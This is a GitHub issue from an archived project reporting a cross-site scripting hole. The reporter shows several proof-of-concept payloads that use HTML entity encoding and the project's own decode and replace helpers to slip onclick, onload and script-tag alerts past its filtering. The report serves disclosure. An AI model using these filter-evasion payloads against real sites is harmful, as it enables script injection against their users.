Skip to content
This repository was archived by the owner on Mar 13, 2019. It is now read-only.
This repository was archived by the owner on Mar 13, 2019. It is now read-only.

Inserting html code allows for javascript to be called #8

Open
Open
Inserting html code allows for javascript to be called#8
Assignees
julianschmuckli
Labels
Security: Cross Site Scripting
@NoRelect

Description

@NoRelect
NoRelect
opened on Jul 10, 2016

The fact that you can insert custom html allows for the onload method to be used to execute javascript. Combining this with the escaped html chars it also passes function replacement:

?> <button onclick="alert&#40;&#34;Hacked&#34;&#41;">Click me for action</button> <?php

The same is also possible with the following:

echo("<!DOCTYPE html><html><head>");
echo("<body onload=alert&#40;&#34;Hacked&#34;&#41;>");

It is also possible like this (unnecessary):

$decoded = jks_string_html_cd("&#60;script&#62;alert(&#34;hacked&#34;)&#60;/script&#62;");
echo("<!DOCTYPE html><head></head><body>");
echo($decoded);

or like this:

$m = "<pre>alert(^hacked^)</pre>";
$m = jks_string_repl("pre","script",$m);
$m = jks_string_repl("^","\"",$m);
echo("<!DOCTYPE html><head></head><body>");
echo($m);

Metadata

Metadata

Assignees

Labels

Security: Cross Site Scripting

Type

No type

Projects

No projects

Milestone

No milestone

Relationships

None yet

Development

No branches or pull requests

Issue actions